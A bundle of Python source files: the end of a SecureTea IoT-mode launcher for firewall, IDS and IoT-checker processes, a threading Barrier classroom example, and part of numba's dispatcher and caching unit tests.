sys.exit(0)
# Initialize objects presence as false
self.firewall = False
self.ids = False
self.iot_checker = False
# Initialize empty process pool list
self.process_pool = []
def create_objects(self):
"""
Create module (Firewall, IDS, IoT Checker) objects
if configuraton parameters are available for these.
Args:
None
Raises:
None
Returns:
None
"""
if self.cred.get("firewall"):
try:
self.logger.log(
"Initializing Firewall object",
logtype="info"
)
# Initialize Firewall object
self.firewallObj = secureTeaFirewall.SecureTeaFirewall(cred=self.cred,
debug=self.debug)
self.firewall = True
self.logger.log(
"Initialized Firewall object",
logtype="info"
)
except KeyError:
self.logger.log(
"Firewall configuration parameter not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
if self.cred.get("ids"):
try:
self.logger.log(
"Initializing IDS object",
logtype="info"
)
# Initialize IDS object
self.ids_obj = secureTeaIDS.SecureTeaIDS(cred=self.cred['ids'],
debug=self.debug)
self.ids = True
self.logger.log(
"Initialized IDS object",
logtype="info"
)
except KeyError:
self.logger.log(
"Intrusion Detection System (IDS) parameter not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
try:
self.logger.log(
"Initializing IoT checker object",
logtype="info"
)
# Initialize IoT Checker object
self.iot_checker_obj = iot_checker.IoTChecker(debug=self.debug,
api_key=self.cred['iot-check']['shodan-api-key'],
ip=self.cred['iot-check']['ip'])
except KeyError:
self.logger.log(
"IoT checker parameters not configured.",
logtype="error"
)
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
def create_process(self):
"""
Create process for the initialized objects.
Args:
None
Raises:
None
Returns:
None
"""
if self.firewall: # if Firewall object is initialized
firewall_process = multiprocessing.Process(target=self.firewallObj.start_firewall)
self.process_pool.append(firewall_process)
if self.ids: # if IDS object is initialized
ids_process = multiprocessing.Process(target=self.ids_obj.start_ids)
self.process_pool.append(ids_process)
if self.iot_checker: # if IoT object is initialized
iot_checker_process = multiprocessing.Process(target=self.iot_checker_obj.check_shodan_range)
self.process_pool.append(iot_checker_process)
def start_process(self):
"""
Start all the process in the process pool
and terminate gracefully in Keyboard Interrupt.
Args:
None
Raises:
None
Returns:
None
"""
try:
for process in self.process_pool:
process.start()
for process in self.process_pool:
process.join()
except KeyboardInterrupt:
for process in self.process_pool:
process.terminate()
except Exception as e:
self.logger.log(
"Error occured: " + str(e),
logtype="error"
)
def start_iot_mode(self):
"""
Start SecureTea in IoT mode.
Args:
None
Raises:
None
Returns:
None
"""
# Create / initialize required objects
self.create_objects()
# Create process for the objects
self.create_process()
# Start the process
self.start_process()
|
barrier.py
|
#studi kasus tentang perlombaan cerdas cermat
from random import randrange
from threading import Barrier, Thread
from time import ctime, sleep
num_cerdascermat = 5
hasilakhir = Barrier(num_cerdascermat)
peserta = ['nisa', 'rama', 'titin', 'nur', 'ayu']
def siswa():
name = peserta.pop()
sleep(randrange(2, 7)) # menunggu dengan sesuai waktu dari 2 samap denga 7 secara random
print('%s selesai mengerjakan pada: %s \n' % (name, ctime()))
hasilakhir.wait() #menunggu semua thread selesai digunakan untuk memblokir
#thread yang melakukan panggilan
def main():
threads = []
print('mulai mengerjakan!!')
for i in range(num_cerdascermat): #membuat tread baru agar dapar menjalankan function
threads.append(Thread(target=siswa))
threads[-1].start() #menunggu thread selesai
for thread in threads:
thread.join()
print('selesai!')#tread selesai
if __name__ == "__main__":
main()
|
test_dispatcher.py
|
from __future__ import print_function, division, absolute_import
import errno
import multiprocessing
import os
import shutil
import subprocess
import sys
import threading
import warnings
import inspect
import numpy as np
from numba import unittest_support as unittest
from numba import utils, jit, generated_jit, types, typeof
from numba import _dispatcher
from numba.compiler import compile_isolated
from numba.errors import NumbaWarning
from .support import (TestCase, tag, temp_directory, import_dynamic,
override_env_config, capture_cache_log, captured_stdout)
from numba.targets import codegen
from numba.caching import _UserWideCacheLocator
import llvmlite.binding as ll
def dummy(x):
return x
def add(x, y):
return x + y
def addsub(x, y, z):
return x - y + z
def addsub_defaults(x, y=2, z=3):
return x - y + z
def star_defaults(x, y=2, *z):
return x, y, z
def generated_usecase(x, y=5):
if isinstance(x, types.Complex):
def impl(x, y):
return x + y
else:
def impl(x, y):
return x - y
return impl
def bad_generated_usecase(x, y=5):
if isinstance(x, types.Complex):
def impl(x):
return x
else:
def impl(x, y=6):
return x - y
return impl
class BaseTest(TestCase):
jit_args = dict(nopython=True)
def compile_func(self, pyfunc):
def check(*args, **kwargs):
expected = pyfunc(*args, **kwargs)
result = f(*args, **kwargs)
self.assertPreciseEqual(result, expected)
f = jit(**self.jit_args)(pyfunc)
return f, check
def check_access_is_preventable():
# This exists to check whether it is possible to prevent access to
# a file/directory through the use of `chmod 500`. If a user has
# elevated rights (e.g. root) then writes are likely to be possible
# anyway. Tests that require functioning access prevention are
# therefore skipped based on the result of this check.
tempdir = temp_directory('test_cache')
test_dir = (os.path.join(tempdir, 'writable_test'))
os.mkdir(test_dir)
# assume access prevention is not possible
ret = False
# check a write is possible
with open(os.path.join(test_dir, 'write_ok'), 'wt') as f:
f.write('check1')
# now forbid access
os.chmod(test_dir, 0o500)
try:
with open(os.path.join(test_dir, 'write_forbidden'), 'wt') as f:
f.write('check2')
except (OSError, IOError) as e:
# Check that the cause of the exception is due to access/permission
# as per https://github.com/conda/conda/blob/4.5.0/conda/gateways/disk/permissions.py#L35-L37
eno = getattr(e, 'errno', None)
if eno in (errno.EACCES, errno.EPERM):
# errno reports access/perm fail so access prevention via
# `chmod 500` works for this user.
ret = True
finally:
os.chmod(test_dir, 0o775)
shutil.rmtree(test_dir)
return ret
_access_preventable = check_access_is_preventable()
_access_msg = "Cannot create a directory to which writes are preventable"
skip_bad_access = unittest.skipUnless(_access_preventable, _access_msg)
class TestDispatcher(BaseTest):
def test_dyn_pyfunc(self):
@jit
def foo(x):
return x
foo(1)
[cr] = foo.overloads.values()
# __module__ must be match that of foo
self.assertEqual(cr.entry_point.__module__, foo.py_func.__module__)
def test_no_argument(self):
@jit
def foo():
return 1
# Just make sure this doesn't crash
foo()
def test_coerce_input_types(self):
# Issue #486: do not allow unsafe conversions if we can still
# compile other specializations.
c_add = jit(nopython=True)(add)
self.assertPreciseEqual(c_add(123, 456), add(123, 456))
self.assertPreciseEqual(c_add(12.3, 45.6), add(12.3, 45.6))
self.assertPreciseEqual(c_add(12.3, 45.6j), add(12.3, 45.6j))
self.assertPreciseEqual(c_add(12300000000, 456), add(12300000000, 456))
# Now force compilation of only a single specialization
c_add = jit('(i4, i4)', nopython=True)(add)
self.assertPreciseEqual(c_add(123, 456), add(123, 456))
# Implicit (unsafe) conversion of float to int
self.assertPreciseEqual(c_add(12.3, 45.6), add(12, 45))
with self.assertRaises(TypeError):
# Implicit conversion of complex to int disallowed
c_add(12.3, 45.6j)
def test_ambiguous_new_version(self):
"""Test compiling new version in an ambiguous case
"""
@jit
def foo(a, b):
return a + b
INT = 1
FLT = 1.5
self.assertAlmostEqual(foo(INT, FLT), INT + FLT)
self.assertEqual(len(foo.overloads), 1)
self.assertAlmostEqual(foo(FLT, INT), FLT + INT)
self.assertEqual(len(foo.overloads), 2)
self.assertAlmostEqual(foo(FLT, FLT), FLT + FLT)
self.assertEqual(len(foo.overloads), 3)
# The following call is ambiguous because (int, int) can resolve
# to (float, int) or (int, float) with equal weight.
self.assertAlmostEqual(foo(1, 1), INT + INT)
self.assertEqual(len(foo.overloads), 4, "didn't compile a new "
"version")
def test_lock(self):
"""
Test that (lazy) compiling from several threads at once doesn't
produce errors (see issue #908).
"""
errors = []
@jit
def foo(x):
return x + 1
def wrapper():
try:
self.assertEqual(foo(1), 2)
except BaseException as e:
errors.append(e)
threads = [threading.Thread(target=wrapper) for i in range(16)]
for t in threads:
t.start()
for t in threads:
t.join()
self.assertFalse(errors)
def test_explicit_signatures(self):
f = jit("(int64,int64)")(add)
# Approximate match (unsafe conversion)
self.assertPreciseEqual(f(1.5, 2.5), 3)
self.assertEqual(len(f.overloads), 1, f.overloads)
f = jit(["(int64,int64)", "(float64,float64)"])(add)
# Exact signature matches
self.assertPreciseEqual(f(1, 2), 3)
self.assertPreciseEqual(f(1.5, 2.5), 4.0)
# Approximate match (int32 -> float64 is a safe conversion)
self.assertPreciseEqual(f(np.int32(1), 2.5), 3.5)
# No conversion
with self.assertRaises(TypeError) as cm:
f(1j, 1j)
self.assertIn("No matching definition", str(cm.exception))
self.assertEqual(len(f.overloads), 2, f.overloads)
# A more interesting one...
f = jit(["(float32,float32)", "(float64,float64)"])(add)
self.assertPreciseEqual(f(np.float32(1), np.float32(2**-25)), 1.0)
self.assertPreciseEqual(f(1, 2**-25), 1.0000000298023224)
# Fail to resolve ambiguity between the two best overloads
f = jit(["(float32,float64)",
"(float64,float32)",
"(int64,int64)"])(add)
with self.assertRaises(TypeError) as cm:
f(1.0, 2.0)
# The two best matches are output in the error message, as well
# as the actual argument types.
self.assertRegexpMatches(
str(cm.exception),
r"Ambiguous overloading for <function add [^>]*> \(float64, float64\):\n"
r"\(float32, float64\) -> float64\n"
r"\(float64, float32\) -> float64"
)
# The integer signature is not part of the best matches
self.assertNotIn("int64", str(cm.exception))
def test_signature_mismatch(self):
tmpl = "Signature mismatch: %d argument types given, but function takes 2 arguments"
with self.assertRaises(TypeError) as cm:
jit("()")(add)
self.assertIn(tmpl % 0, str(cm.exception))
with self.assertRaises(TypeError) as cm:
jit("(intc,)")(add)
self.assertIn(tmpl % 1, str(cm.exception))
with self.assertRaises(TypeError) as cm:
jit("(intc,intc,intc)")(add)
self.assertIn(tmpl % 3, str(cm.exception))
# With forceobj=True, an empty tuple is accepted
jit("()", forceobj=True)(add)
with self.assertRaises(TypeError) as cm:
jit("(intc,)", forceobj=True)(add)
self.assertIn(tmpl % 1, str(cm.exception))
def test_matching_error_message(self):
f = jit("(intc,intc)")(add)
with self.assertRaises(TypeError) as cm:
f(1j, 1j)
self.assertEqual(str(cm.exception),
"No matching definition for argument type(s) "
"complex128, complex128")
def test_disabled_compilation(self):
@jit
def foo(a):
return a
foo.compile("(float32,)")
foo.disable_compile()
with self.assertRaises(RuntimeError) as raises:
foo.compile("(int32,)")
self.assertEqual(str(raises.exception), "compilation disabled")
self.assertEqual(len(foo.signatures), 1)
def test_disabled_compilation_through_list(self):
@jit(["(float32,)", "(int32,)"])
def foo(a):
return a
with self.assertRaises(RuntimeError) as raises:
foo.compile("(complex64,)")
self.assertEqual(str(raises.exception), "compilation disabled")
self.assertEqual(len(foo.signatures), 2)
def test_disabled_compilation_nested_call(self):
@jit(["(intp,)"])
def foo(a):
return a
@jit
def bar():
foo(1)
foo(np.ones(1)) # no matching definition
with self.assertRaises(TypeError) as raises:
bar()
m = "No matching definition for argument type(s) array(float64, 1d, C)"
self.assertEqual(str(raises.exception), m)
def test_fingerprint_failure(self):
"""
Failure in computing the fingerprint cannot affect a nopython=False
function. On the other hand, with nopython=True, a ValueError should
be raised to report the failure with fingerprint.
"""
@jit
def foo(x):
return x
# Empty list will trigger failure in compile_fingerprint
errmsg = 'cannot compute fingerprint of empty list'
with self.assertRaises(ValueError) as raises:
_dispatcher.compute_fingerprint([])
self.assertIn(errmsg, str(raises.exception))
# It should work in fallback
self.assertEqual(foo([]), [])
# But, not in nopython=True
strict_foo = jit(nopython=True)(foo.py_func)
with self.assertRaises(ValueError) as raises:
strict_foo([])
self.assertIn(errmsg, str(raises.exception))
# Test in loop lifting context
@jit
def bar():
object() # force looplifting
x = []
for i in range(10):
x = foo(x)
return x
self.assertEqual(bar(), [])
# Make sure it was looplifted
[cr] = bar.overloads.values()
self.assertEqual(len(cr.lifted), 1)
class TestSignatureHandling(BaseTest):
"""
Test support for various parameter passing styles.
"""
@tag('important')
def test_named_args(self):
"""
Test passing named arguments to a dispatcher.
"""
f, check = self.compile_func(addsub)
check(3, z=10, y=4)
check(3, 4, 10)
check(x=3, y=4, z=10)
# All calls above fall under the same specialization
self.assertEqual(len(f.overloads), 1)
# Errors
with self.assertRaises(TypeError) as cm:
f(3, 4, y=6, z=7)
self.assertIn("too many arguments: expected 3, got 4",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f()
self.assertIn("not enough arguments: expected 3, got 0",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(3, 4, y=6)
self.assertIn("missing argument 'z'", str(cm.exception))
def test_default_args(self):
"""
Test omitting arguments with a default value.
"""
f, check = self.compile_func(addsub_defaults)
check(3, z=10, y=4)
check(3, 4, 10)
check(x=3, y=4, z=10)
# Now omitting some values
check(3, z=10)
check(3, 4)
check(x=3, y=4)
check(3)
check(x=3)
# Errors
with self.assertRaises(TypeError) as cm:
f(3, 4, y=6, z=7)
self.assertIn("too many arguments: expected 3, got 4",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f()
self.assertIn("not enough arguments: expected at least 1, got 0",
str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(y=6, z=7)
self.assertIn("missing argument 'x'", str(cm.exception))
def test_star_args(self):
"""
Test a compiled function with starargs in the signature.
"""
f, check = self.compile_func(star_defaults)
check(4)
check(4, 5)
check(4, 5, 6)
check(4, 5, 6, 7)
check(4, 5, 6, 7, 8)
check(x=4)
check(x=4, y=5)
check(4, y=5)
with self.assertRaises(TypeError) as cm:
f(4, 5, y=6)
self.assertIn("some keyword arguments unexpected", str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(4, 5, z=6)
self.assertIn("some keyword arguments unexpected", str(cm.exception))
with self.assertRaises(TypeError) as cm:
f(4, x=6)
self.assertIn("some keyword arguments unexpected", str(cm.exception))
class TestSignatureHandlingObjectMode(TestSignatureHandling):
"""
Sams as TestSignatureHandling, but in object mode.
"""
jit_args = dict(forceobj=True)
class TestGeneratedDispatcher(TestCase):
"""
Tests for @generated_jit.
"""
@tag('important')
def test_generated(self):
f = generated_jit(nopython=True)(generated_usecase)
self.assertEqual(f(8), 8 - 5)
self.assertEqual(f(x=8), 8 - 5)
self.assertEqual(f(x=8, y=4), 8 - 4)
self.assertEqual(f(1j), 5 + 1j)
self.assertEqual(f(1j, 42), 42 + 1j)
self.assertEqual(f(x=1j, y=7), 7 + 1j)
def test_signature_errors(self):
"""
Check error reporting when implementation signature doesn't match
generating function signature.
"""
f = generated_jit(nopython=True)(bad_generated_usecase)
# Mismatching # of arguments
with self.assertRaises(TypeError) as raises:
f(1j)
self.assertIn("should be compatible with signature '(x, y=5)', but has signature '(x)'",
str(raises.exception))
# Mismatching defaults
with self.assertRaises(TypeError) as raises:
f(1)
self.assertIn("should be compatible with signature '(x, y=5)', but has signature '(x, y=6)'",
str(raises.exception))
class TestDispatcherMethods(TestCase):
def test_recompile(self):
closure = 1
@jit
def foo(x):
return x + closure
self.assertPreciseEqual(foo(1), 2)
self.assertPreciseEqual(foo(1.5), 2.5)
self.assertEqual(len(foo.signatures), 2)
closure = 2
self.assertPreciseEqual(foo(1), 2)
# Recompiling takes the new closure into account.
foo.recompile()
# Everything was recompiled
self.assertEqual(len(foo.signatures), 2)
self.assertPreciseEqual(foo(1), 3)
self.assertPreciseEqual(foo(1.5), 3.5)
def test_recompile_signatures(self):
# Same as above, but with an explicit signature on @jit.
closure = 1
@jit("int32(int32)")
def foo(x):
return x + closure
self.assertPreciseEqual(foo(1), 2)
self.assertPreciseEqual(foo(1.5), 2)
closure = 2
self.assertPreciseEqual(foo(1), 2)
# Recompiling takes the new closure into account.
foo.recompile()
self.assertPreciseEqual(foo(1), 3)
self.assertPreciseEqual(foo(1.5), 3)
@tag('important')
def test_inspect_llvm(self):
# Create a jited function
@jit
def foo(explicit_arg1, explicit_arg2):
return explicit_arg1 + explicit_arg2
# Call it in a way to create 3 signatures
foo(1, 1)
foo(1.0, 1)
foo(1.0, 1.0)
# base call to get all llvm in a dict
llvms = foo.inspect_llvm()
self.assertEqual(len(llvms), 3)
# make sure the function name shows up in the llvm
for llvm_bc in llvms.values():
# Look for the function name
self.assertIn("foo", llvm_bc)
# Look for the argument names
self.assertIn("explicit_arg1", llvm_bc)
self.assertIn("explicit_arg2", llvm_bc)
def test_inspect_asm(self):
# Create a jited function
@jit
def foo(explicit_arg1, explicit_arg2):
return explicit_arg1 + explicit_arg2
# Call it in a way to create 3 signatures
foo(1, 1)
foo(1.0, 1)
foo(1.0, 1.0)
# base call to get all llvm in a dict
asms = foo.inspect_asm()
self.assertEqual(len(asms), 3)
# make sure the function name shows up in the llvm
for asm in asms.values():
# Look for the function name
self.assertTrue("foo" in asm)
def _check_cfg_display(self, cfg, wrapper=''):
# simple stringify test
if wrapper:
wrapper = "{}{}".format(len(wrapper), wrapper)
module_name = __name__.split('.', 1)[0]
module_len = len(module_name)
prefix = r'^digraph "CFG for \'_ZN{}{}{}'.format(wrapper, module_len, module_name)
self.assertRegexpMatches(str(cfg), prefix)
# .display() requires an optional dependency on `graphviz`.
# just test for the attribute without running it.
self.assertTrue(callable(cfg.display))
def test_inspect_cfg(self):
# Exercise the .inspect_cfg(). These are minimal tests and do not fully
# check the correctness of the function.
@jit
def foo(the_array):
return the_array.sum()
# Generate 3 overloads
a1 = np.ones(1)
a2 = np.ones((1, 1))
a3 = np.ones((1, 1, 1))
foo(a1)
foo(a2)
foo(a3)
# Call inspect_cfg() without arguments
cfgs = foo.inspect_cfg()
# Correct count of overloads
self.assertEqual(len(cfgs), 3)
# Makes sure all the signatures are correct
[s1, s2, s3] = cfgs.keys()
self.assertEqual(set([s1, s2, s3]),
set(map(lambda x: (typeof(x),), [a1, a2, a3])))
for cfg in cfgs.values():
self._check_cfg_display(cfg)
self.assertEqual(len(list(cfgs.values())), 3)
# Call inspect_cfg(signature)
cfg = foo.inspect_cfg(signature=foo.signatures[0])
self._check_cfg_display(cfg)
def test_inspect_cfg_with_python_wrapper(self):
# Exercise the .inspect_cfg() including the python wrapper.
# These are minimal tests and do not fully check the correctness of
# the function.
@jit
def foo(the_array):
return the_array.sum()
# Generate 3 overloads
a1 = np.ones(1)
a2 = np.ones((1, 1))
a3 = np.ones((1, 1, 1))
foo(a1)
foo(a2)
foo(a3)
# Call inspect_cfg(signature, show_wrapper="python")
cfg = foo.inspect_cfg(signature=foo.signatures[0],
show_wrapper="python")
self._check_cfg_display(cfg, wrapper='cpython')
def test_inspect_types(self):
@jit
def foo(a, b):
return a + b
foo(1, 2)
# Exercise the method
foo.inspect_types(utils.StringIO())
def test_inspect_types_pretty(self):
@jit
def foo(a, b):
return a + b
foo(1, 2)
# Exercise the method, dump the output
with captured_stdout():
ann = foo.inspect_types(pretty=True)
# ensure HTML <span> is found in the annotation output
for k, v in ann.ann.items():
span_found = False
for line in v['pygments_lines']:
if 'span' in line[2]:
span_found = True
self.assertTrue(span_found)
# check that file+pretty kwarg combo raises
with self.assertRaises(ValueError) as raises:
foo.inspect_types(file=utils.StringIO(), pretty=True)
self.assertIn("`file` must be None if `pretty=True`",
str(raises.exception))
def test_issue_with_array_layout_conflict(self):
"""
This test an issue with the dispatcher when an array that is both
C and F contiguous is supplied as the first signature.
The dispatcher checks for F contiguous first but the compiler checks
for C contiguous first. This results in an C contiguous code inserted
as F contiguous function.
"""
def pyfunc(A, i, j):
return A[i, j]
cfunc = jit(pyfunc)
ary_c_and_f = np.array([[1.]])
ary_c = np.array([[0., 1.], [2., 3.]], order='C')
ary_f = np.array([[0., 1.], [2., 3.]], order='F')
exp_c = pyfunc(ary_c, 1, 0)
exp_f = pyfunc(ary_f, 1, 0)
self.assertEqual(1., cfunc(ary_c_and_f, 0, 0))
got_c = cfunc(ary_c, 1, 0)
got_f = cfunc(ary_f, 1, 0)
self.assertEqual(exp_c, got_c)
self.assertEqual(exp_f, got_f)
class BaseCacheTest(TestCase):
# This class is also used in test_cfunc.py.
# The source file that will be copied
usecases_file = None
# Make sure this doesn't conflict with another module
modname = None
def setUp(self):
self.tempdir = temp_directory('test_cache')
sys.path.insert(0, self.tempdir)
self.modfile = os.path.join(self.tempdir, self.modname + ".py")
self.cache_dir = os.path.join(self.tempdir, "__pycache__")
shutil.copy(self.usecases_file, self.modfile)
self.maxDiff = None
def tearDown(self):
sys.modules.pop(self.modname, None)
sys.path.remove(self.tempdir)
def import_module(self):
# Import a fresh version of the test module. All jitted functions
# in the test module will start anew and load overloads from
# the on-disk cache if possible.
old = sys.modules.pop(self.modname, None)
if old is not None:
# Make sure cached bytecode is removed
if sys.version_info >= (3,):
cached = [old.__cached__]
else:
if old.__file__.endswith(('.pyc', '.pyo')):
cached = [old.__file__]
else:
cached = [old.__file__ + 'c', old.__file__ + 'o']
for fn in cached:
try:
os.unlink(fn)
except OSError as e:
if e.errno != errno.ENOENT:
raise
mod = import_dynamic(self.modname)
self.assertEqual(mod.__file__.rstrip('co'), self.modfile)
return mod
def cache_contents(self):
try:
return [fn for fn in os.listdir(self.cache_dir)
if not fn.endswith(('.pyc', ".pyo"))]
except OSError as e:
if e.errno != errno.ENOENT:
raise
return []
def get_cache_mtimes(self):
return dict((fn, os.path.getmtime(os.path.join(self.cache_dir, fn)))
for fn in sorted(self.cache_contents()))
def check_pycache(self, n):
c = self.cache_contents()
self.assertEqual(len(c), n, c)
def dummy_test(self):
pass
class BaseCacheUsecasesTest(BaseCacheTest):
here = os.path.dirname(__file__)
usecases_file = os.path.join(here, "cache_usecases.py")
modname = "dispatcher_caching_test_fodder"
def run_in_separate_process(self):
# Cached functions can be run from a distinct process.
# Also stresses issue #1603: uncached function calling cached function
# shouldn't fail compiling.
code = """if 1:
import sys
sys.path.insert(0, %(tempdir)r)
mod = __import__(%(modname)r)
mod.self_test()
""" % dict(tempdir=self.tempdir, modname=self.modname)
popen = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = popen.communicate()
if popen.returncode != 0:
raise AssertionError("process failed with code %s: stderr follows\n%s\n"
% (popen.returncode, err.decode()))
def check_module(self, mod):
self.check_pycache(0)
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(2) # 1 index, 1 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(3) # 1 index, 2 data
f = mod.add_objmode_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(5) # 2 index, 3 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(6) # 2 index, 4 data
mod.self_test()
def check_hits(self, func, hits, misses=None):
st = func.stats
self.assertEqual(sum(st.cache_hits.values()), hits, st.cache_hits)
if misses is not None:
self.assertEqual(sum(st.cache_misses.values()), misses,
st.cache_misses)
class TestCache(BaseCacheUsecasesTest):
@tag('important')
def test_caching(self):
self.check_pycache(0)
mod = self.import_module()
self.check_pycache(0)
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(2) # 1 index, 1 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(3) # 1 index, 2 data
self.check_hits(f, 0, 2)
f = mod.add_objmode_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(5) # 2 index, 3 data
self.assertPreciseEqual(f(2.5, 3), 6.5)
self.check_pycache(6) # 2 index, 4 data
self.check_hits(f, 0, 2)
f = mod.record_return
rec = f(mod.aligned_arr, 1)
self.assertPreciseEqual(tuple(rec), (2, 43.5))
rec = f(mod.packed_arr, 1)
self.assertPreciseEqual(tuple(rec), (2, 43.5))
self.check_pycache(9) # 3 index, 6 data
self.check_hits(f, 0, 2)
f = mod.generated_usecase
self.assertPreciseEqual(f(3, 2), 1)
self.assertPreciseEqual(f(3j, 2), 2 + 3j)
# Check the code runs ok from another process
self.run_in_separate_process()
@tag('important')
def test_caching_nrt_pruned(self):
self.check_pycache(0)
mod = self.import_module()
self.check_pycache(0)
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(2) # 1 index, 1 data
# NRT pruning may affect cache
self.assertPreciseEqual(f(2, np.arange(3)), 2 + np.arange(3) + 1)
self.check_pycache(3) # 1 index, 2 data
self.check_hits(f, 0, 2)
def test_inner_then_outer(self):
# Caching inner then outer function is ok
mod = self.import_module()
self.assertPreciseEqual(mod.inner(3, 2), 6)
self.check_pycache(2) # 1 index, 1 data
# Uncached outer function shouldn't fail (issue #1603)
f = mod.outer_uncached
self.assertPreciseEqual(f(3, 2), 2)
self.check_pycache(2) # 1 index, 1 data
mod = self.import_module()
f = mod.outer_uncached
self.assertPreciseEqual(f(3, 2), 2)
self.check_pycache(2) # 1 index, 1 data
# Cached outer will create new cache entries
f = mod.outer
self.assertPreciseEqual(f(3, 2), 2)
self.check_pycache(4) # 2 index, 2 data
self.assertPreciseEqual(f(3.5, 2), 2.5)
self.check_pycache(6) # 2 index, 4 data
def test_outer_then_inner(self):
# Caching outer then inner function is ok
mod = self.import_module()
self.assertPreciseEqual(mod.outer(3, 2), 2)
self.check_pycache(4) # 2 index, 2 data
self.assertPreciseEqual(mod.outer_uncached(3, 2), 2)
self.check_pycache(4) # same
mod = self.import_module()
f = mod.inner
self.assertPreciseEqual(f(3, 2), 6)
self.check_pycache(4) # same
self.assertPreciseEqual(f(3.5, 2), 6.5)
self.check_pycache(5) # 2 index, 3 data
def test_no_caching(self):
mod = self.import_module()
f = mod.add_nocache_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_pycache(0)
def test_looplifted(self):
# Loop-lifted functions can't be cached and raise a warning
mod = self.import_module()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
f = mod.looplifted
self.assertPreciseEqual(f(4), 6)
self.check_pycache(0)
self.assertEqual(len(w), 1)
self.assertEqual(str(w[0].message),
'Cannot cache compiled function "looplifted" '
'as it uses lifted loops')
def test_big_array(self):
# Code references big array globals cannot be cached
mod = self.import_module()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
f = mod.use_big_array
np.testing.assert_equal(f(), mod.biggie)
self.check_pycache(0)
self.assertEqual(len(w), 1)
self.assertIn('Cannot cache compiled function "use_big_array" '
'as it uses dynamic globals', str(w[0].message))
def test_ctypes(self):
# Functions using a ctypes pointer can't be cached and raise
# a warning.
mod = self.import_module()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
f = mod.use_c_sin
self.assertPreciseEqual(f(0.0), 0.0)
self.check_pycache(0)
self.assertEqual(len(w), 1)
self.assertIn('Cannot cache compiled function "use_c_sin"',
str(w[0].message))
def test_closure(self):
mod = self.import_module()
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter('always', NumbaWarning)
f = mod.closure1
self.assertPreciseEqual(f(3), 6)
f = mod.closure2
self.assertPreciseEqual(f(3), 8)
self.check_pycache(0)
self.assertEqual(len(w), 2)
for item in w:
self.assertIn('Cannot cache compiled function "closure"',
str(item.message))
def test_cache_reuse(self):
mod = self.import_module()
mod.add_usecase(2, 3)
mod.add_usecase(2.5, 3.5)
mod.add_objmode_usecase(2, 3)
mod.outer_uncached(2, 3)
mod.outer(2, 3)
mod.record_return(mod.packed_arr, 0)
mod.record_return(mod.aligned_arr, 1)
mod.generated_usecase(2, 3)
mtimes = self.get_cache_mtimes()
# Two signatures compiled
self.check_hits(mod.add_usecase, 0, 2)
mod2 = self.import_module()
self.assertIsNot(mod, mod2)
f = mod2.add_usecase
f(2, 3)
self.check_hits(f, 1, 0)
f(2.5, 3.5)
self.check_hits(f, 2, 0)
f = mod2.add_objmode_usecase
f(2, 3)
self.check_hits(f, 1, 0)
# The files haven't changed
self.assertEqual(self.get_cache_mtimes(), mtimes)
self.run_in_separate_process()
self.assertEqual(self.get_cache_mtimes(), mtimes)
def test_cache_invalidate(self):
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
# This should change the functions' results
with open(self.modfile, "a") as f:
f.write("\nZ = 10\n")
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 15)
f = mod.add_objmode_usecase
self.assertPreciseEqual(f(2, 3), 15)
def test_recompile(self):
# Explicit call to recompile() should overwrite the cache
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
mod = self.import_module()
f = mod.add_usecase
mod.Z = 10
self.assertPreciseEqual(f(2, 3), 6)
f.recompile()
self.assertPreciseEqual(f(2, 3), 15)
# Freshly recompiled version is re-used from other imports
mod = self.import_module()
f = mod.add_usecase
self.assertPreciseEqual(f(2, 3), 15)
def test_same_names(self):
# Function with the same names should still disambiguate
mod = self.import_module()
f = mod.renamed_function1
self.assertPreciseEqual(f(2), 4)
f = mod.renamed_function2
self.assertPreciseEqual(f(2), 8)
def test_frozen(self):
from .dummy_module import function
old_code = function.__code__
code_obj = compile('pass', 'tests/dummy_module.py', 'exec')
try:
function.__code__ = code_obj
source = inspect.getfile(function)
# doesn't return anything, since it cannot find the module
# fails unless the executable is frozen
locator = _UserWideCacheLocator.from_function(function, source)
self.assertIsNone(locator)
sys.frozen = True
# returns a cache locator object, only works when executable is frozen
locator = _UserWideCacheLocator.from_function(function, source)
self.assertIsInstance(locator, _UserWideCacheLocator)
finally:
function.__code__ = old_code
del sys.frozen
def _test_pycache_fallback(self):
"""
With a disabled __pycache__, test there is a working fallback
(e.g. on the user-wide cache dir)
"""
mod = self.import_module()
f = mod.add_usecase
# Remove this function's cache files at the end, to avoid accumulation
# accross test calls.
self.addCleanup(shutil.rmtree, f.stats.cache_path, ignore_errors=True)
self.assertPreciseEqual(f(2, 3), 6)
# It's a cache miss since the file was copied to a new temp location
self.check_hits(f, 0, 1)
# Test re-use
mod2 = self.import_module()
f = mod2.add_usecase
self.assertPreciseEqual(f(2, 3), 6)
self.check_hits(f, 1, 0)
# The __pycache__ is empty (otherwise the test's preconditions
# wouldn't be met)
self.check_pycache(0)
@skip_bad_access
@unittest.skipIf(os.name == "nt",
